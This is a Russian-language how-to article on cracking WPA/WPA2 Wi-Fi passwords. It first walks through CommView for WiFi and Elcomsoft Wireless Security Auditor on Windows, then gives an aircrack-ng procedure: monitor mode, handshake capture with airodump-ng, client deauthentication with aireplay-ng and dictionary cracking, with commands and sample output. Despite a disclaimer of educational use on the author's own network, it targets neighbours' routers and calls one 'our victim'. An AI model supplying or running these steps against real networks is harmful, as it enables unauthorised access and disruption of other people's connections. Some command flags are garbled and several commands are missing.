Взлом Wi-Fi средствами Windows: использование программы CommViewWiFi

ВНИМАНИЕ! Данную инструкцию можно использовать только в ознакомительных целях. В некоторых странах взлом Wi-Fi – уголовно наказуемое преступление. Взлом был произведен на примере собственной домашней сети и ни один соседский роутер не пострадал. Статья была создана для обучения будущих работников сетевой безопасности.

Всем привет. Как вы знаете, сейчас почти каждая обычная домашняя сеть использует тип шифрования WPA2-PSK. Данные сети достаточно сложно взломать, но как оказалось это вполне реально. Способ, который я буду использовать не мой, а одного иностранного программиста, занимающегося улучшением безопасности в одной крупной компании. Взлом WiFi будет производиться в операционной системе Windows.

В общем, сегодня мы опробуем его способ, но его нужно использовать только в качестве улучшения своей компьютерной грамотности. Для начала давайте я перечислю, что именно вам понадобится:

• В первую очередь желательно, чтобы система была 64-х битная, так как могут быть проблемы с драйверами. И желательно использовать Windows 7;
• Мы будем использовать перебор, поэтому очень важно вычислительная мощность. Желательно иметь мощную видео карту;
• Нам понадобится средство для взлома или приложение «CommViewWiFi»;
• Драйвер для перехвата
• Рекомендую использовать адаптер ALFA – они имеют широкий диапазон охвата и отлично подходят для взлома.

Ещё один момент, когда будете скачивать программу, обязательно нужно будет установить драйвер для перехвата. Он скачивается оттуда же от куда вы будете качать ПО. Также смотрите на совместимость вашего вай-фай адаптера. Если у вас вообще нет никакого модуля, то вы можете посмотреть совместимые адаптеры на сайте и приобрести его в магазине или заказать через интернет.

Инструкция

Вы купили адаптер, установили программу «CommView WiFi». На некоторых модулях устанавливать драйвера не нужно и ПО автоматом настроит вам адаптер. Ещё один совет – если у вас в системе есть ещё один вайфай адаптер, то отключите его, так как работать должен только один. Я бы на вашем месте зашел в «диспетчер устройств» и проверил это.

1. После запуска программы вы увидите процесс настройки вашего адаптера;

1. Зайдите в настройки и в раздел «Memory Usage». Установите бегунок на максимальное значение. Это нужно, чтобы при переборе использовалось максимальное количество памяти;

1. Все необходимые настройки мы выполнили, теперь осталось запустить программку. Для этого находим кнопочку со стрелкой типа «Play» и нажимаем на неё. Если ваш адаптер правильно настроен, то приложение начнем перехватывать трафик, а также в таблице вы увидите информацию о соседских роутерах.

1. И так, у нас есть несколько роутеров. Нужно выбрать именно тот, у которого идёт активный трафик, тогда его можно будет попробовать расшифровать. Также смотрите на уровень сигнала, чтобы аппарат был как можно ближе. Таким образом, мы снизим шанс ошибки и помех. Я выбрал аппарат с 4 каналом. Справа выберите «Single channel mode» и выберите нужный канал;
2. Перезапустите приложение. Опять нажимаем на поиск трафика.

1. Теперь мы видим только нашу жертву. Нажмите на «Инструменты» и далее «Node Reassociation». Откроется вот такое окошко. Выбираем устройство и далее нажимаем «Send Now»;

1. Теперь мы начали захват пакетов, и вы должны увидеть их список в программе. Наша задача перехватить как можно больше. Один из советов – периодически останавливайте перехват и снова начинайте. Примерное время перехвата: 6-7 минут. После всего нужно сохранить файл – нажимаем на значок дискеты и сохраняем файлик в любое место;
2. Файлы перехвачены и сохранены. Теперь их надо расшифровать, для этого нам понадобится программа «Elcomsoft Wireless Security Auditor». Запускаем её и нажимаем «Импорт данных» – «Импортировать лог-файл CommView»;

И на этом практически все, дальше запускаем программу и ждем расшифровки. Все зависит от мощности вашего ПК. По умолчанию программа может выбирать как CPU, так и GPU для расшифровки и перебора. Я ставил программу на всю ночь, и она впоследствии работала до обеда. Взламывал я свой роутер и в конце это удалось.

Инструкция по взлому wifi — полная

Существует важное различие между взломом WPA/WPA2 и WEP. Если в WEP для ускорения процесса взлома используются статистические методы, WPA можно взломать только методом прямого перебора. Это происходит из-за отсутствия постоянного ключа, поэтому сбор начальных векторов (IV) отнюдь не ускорит процесс взлома, как это было бы при атаке на WEP. Единственный способ получить нужную информацию – начать перехват пакетов в момент установки соединения между клиентом и AP. Установка соединения происходит в тот момент, когда клиент входит в сеть (это не совсем верно, но в контексте данного документа, будем руководствоваться этим). Длина PSK может составлять от 8 до 63 символов, и чем она больше, тем меньше вероятность успешного взлома.

Но не все так безнадежно. В случае, если ключ является словарным словом или же менее 8 символов, взлом возможен. Отсюда, кстати, понятно, как создать неломаемую сеть – достаточно использовать WPA/WPA2 и ключ длиной 63 байта, состоящий из случайного набора букв, цифр и псевдосимволов.

Полный перебор – занятие не из легких. Поскольку требуются серьезные вычисления, компьютер может проверять от 50 до 300 ключей в секунду, в зависимости от мощности процессора. Перебор достаточно большого словаря может занять часы, если не дни, а если вы хотите сгенерировать свой собственный файл словаря, который включает в себя все комбинации букв, цифр и псевдосимволов, воспользуйтесь калькулятором времени перебора ( http://lastbit.com/pswcalc.asp ). Например, перебор пароля длиной 6 символов, состоящего из букв верхнего, нижнего регистров и цифр, займет 64 часа, а полный перебор уже 7-и символьного пароля – шесть месяцев. Думаю, не стоит говорить про 29 лет на перебор 8 символов.

Различий между взломом WPA и WPA2 нет, там используется одинаковая аутентификация, поэтому технология та же.

• вы используете пропатченные драйвера, умеющие делать инжекцию ( http://www.aircrack-ng.org/doku.php?id=injection_test – здесь рассказано, как это проверить);
• вы достаточно близки к клиенту, чтобы отправлять и получать от него данные. Запомните, то, что вы можете получать пакеты от AP, еще не значит, что у вас есть возможность отправлять на нее данные. Мощность точки выше мощности вашей карты. Проверить возможность отправки пакетов можно по линку, указанному в пункте выше;
• вы используете aircrack-ng 0.9 stable (иначе некоторые параметры могут быть другими).

Проверьте, что все условия соблюдены, иначе нижеприведенные советы вряд ли вам помогут. Также, не забудьте заменить ath0 на имя интерфейса вашей беспроводной карточки.

Окружение
Чтобы проверить данное руководство в домашних условиях, вам необходимо иметь две беспроводные карточки. Мы используем следующие устройства:

• Атакуемый клиент с WPA2:
— MAC: 00:0F:B5:FD:FB:C2
• AP:
— ESSID: teddy
— MAC: 00:14:6C:7E:40:80
— Channel: 9
• Система AirCrack-ng:
— MAC: 00:0F:B5:88:AC:82

Наша цель – захватить пакеты во время установления защищенного соединения и использовать aircrack-ng для взлома PSK. Это можно сделать активным и пассивным способом. Активный заключается в посылке деаутентификационного пакета клиенту, пассивный — в ожидании, пока клиент начнет устанавливать WPA/WPA2 соединение самостоятельно. Преимущество пассивного способа в том, что отсутствует необходимость в инжекции, поэтому реализация атаки возможна и под Windows.

Вот наши основные шаги:

– запустить беспроводной интерфейс в режиме мониторинга на AP канале;
– запустить на этом же канале airodump-ng с фильтром по bssid;
– использовать aireplay-ng, чтобы деаутентифицировать беспроводного клиента;
– использовать aircrack-ng для взлома PSK ключа.

Шаг 1: запуск беспроводного интерфейса в режиме мониторинга
Итак, нам необходимо включить режим мониторинга. В этом режиме беспроводная карта ловит все пакеты в эфире, вместо обычного режима, когда она «слышит» только то, что адресовано ей. Перехватывая каждый пакет, мы можем отловить момент 4-х этапной WPA/WPA2 аутентификации.

Для начала остановим ath0:

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)

Убедимся, что нет других athX интерфейсов:

lo no wireless extensions.
eth0 no wireless extensions.
wifi0 no wireless extensions.

Если еще какие-то athX присутствуют, остановите их тоже. Теперь установим беспроводную карту на канал 9 в режиме мониторинга:

В этой команде мы используем «wifi0» вместо привычного «ath0», поскольку используем драйвера madwifi-ng. Ответом будет что-то вроде:

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

Обратите внимание на строчку monitor mode enabled. Чтобы проверить, что интерфейс правильно сконфигурирован, запустите:

lo no wireless extensions.
wifi0 no wireless extensions.
eth0 no wireless extensions.
ath0 IEEE 802.11g ESSID:»» Nickname:»»
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

Вы видите, что ath0 работает в режиме мониторинга, на частоте 2.452, что соответствует 9 каналу, и что в AP стоит MAC-адрес вашей карты. В отличии от всех остальных, только драйвера madwifi-ng показывают ваш адрес в поле AP. Итак, все отлично. Очень важным моментом является проверка всех данных перед непосредственным процессом взлома. Если что-то не так, дальнейшие шаги могут оказаться бесполезными. Убедиться в соответствии частоты беспроводной карточки каналу можно по этому адресу: http://www.rflinx.com/help/calculations/#2.4ghz_wifi_channels .

Шаг 2: airodump-ng

Цель этого шага – отловить момент установки безопасного соединения с AP.

# airodump-ng -c 9 —bssid 00:14:6C:7E:40:80 -w psk ath0

-9 – это канал, на котором работает беспроводная сеть
—bssid 00:14:6C:7E:40:80 – MAC адрес AP. Этот параметр отфильтрует “левый” трафик
-w psk – имя файла, в который мы будут записываться пойманные IV
ath0 – имя нашего беспроводного интерфейса

Важно: не используйте параметр —ivs. Вы должны захватывать пакеты целиком. Итак, в случае, если к точке присоединен клиент, на экране появится что-то вроде этого:

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 39 100 51 116 14 9 54 WPA2 CCMP PSK teddy

BSSID STATION PWR Lost Packets Probes

А если клиентов в данный момент нет, то это:

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 39 100 51 0 0 9 54 WPA2 CCMP PSK teddy

Уточним, что иногда для перехвата момента установки соединения приходится совершать дополнительные телодвижения. Ваша карточка должна быть в том же режиме, что AP и клиентское устройство. Например, если ваша карточка в режиме B, а клиент – в режиме G, то отловить аутентификацию не получится. Также, иногда бывает нужно выставить ту же скорость, например 11 Мб или 54 Мб. В общем, если не удалось перехватить установку соединение сразу, следует поэкспериментировать.

Шаг 3: используем aireplay-ng, чтобы отсоединить клиента.
Этот шаг необязателен и выполняется лишь в том случае, когда вы хотите ускорить процесс взлома. Естественно, для выполнения нижеприведенных действий необходимо, чтобы к точке был присоединен хотя бы один клиент. Если в данный момент никаких беспроводных клиентов не наблюдается, расслабьтесь и переходите сразу к следующему шагу. Конечно, если в дальнейшем беспроводной клиент появится, никто не мешает вам вернуться и выполнить все описанные ниже команды.

Итак, на данном этапе мы посылаем беспроводному клиенту сообщение о том, что он больше не ассоциирован с AP. Клиент попытается установить соединение заново и пошлет именно те пакеты, которые нам нужны.

Основываясь на полученных данных из предыдущего шага, выполним на другой консоли следующую команду:

# aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0

-0 означает деаутентификацию
1 – количество деаутентификационных пакетов (можно увеличить)
-a 00:14:6C:7E:40:80 – MAC-адрес AP
-c 00:0F:B5:FD:FB:C2 – MAC-адрес отсекаемого клиента
ath0 – имя нашей беспроводной карточки.

Ответ должен быть таким:

11:09:28 Sending DeAuth to station — STMAC: [00:0F:B5:34:30:30]

Деаутентификационный пакет шлется напрямую с вашего компьютера на компьютер клиента, поэтому убедитесь, что вы находитесь достаточно близко к последнему.

Шаг 4: запускаем aircrack-ng и ломаем PSK ключ.
Цель данного шага – попытаться взломать PSK ключ путем подбора по словарю. Небольшой словарик идет в комплекте с aircrack-ng (password.lst), более объемные словари можно легко найти в сети или сгенерировать самостоятельно при помощи известной программы John the Ripper.

Открываем новую консоль и запускаем:

# aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap

-w password.lst назначает имя файла со словарем
psk*.cap назначает имя файла с перехваченными пакетами. Маска “*” используется, поскольку файл может быть не один.

В случае, если аутентификационные пакеты не найдены, вывод будет примерно следующим:

Opening psk-01.cap
Opening psk-02.cap
Opening psk-03.cap
Read 1827 packets.
No valid WPA handshakes found.

Если это произошло, попробуйте повторить третий шаг и заново выбить беспроводного клиента из сети, чтобы он повторил процедуру установления соединения. Если вы использовали пассивный метод сбора пакетов, ждите дальше, пока не появится клиент, устанавливающий соединение. Вывод в случае нахождения подходящих пакетов будет таким:

Opening psk-01.cap
Opening psk-02.cap
Opening psk-03.cap
Opening psk-04.cap
Read 1827 packets.

С этого момента aircrack-ng может начать взлом PSK ключа. В зависимости от скорости вашего процессора и размера словаря, этот процесс может занять часы или дни. Успешный взлом ключа выглядит так:

Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E

B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD

Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98

CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40

FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E

2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71

EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB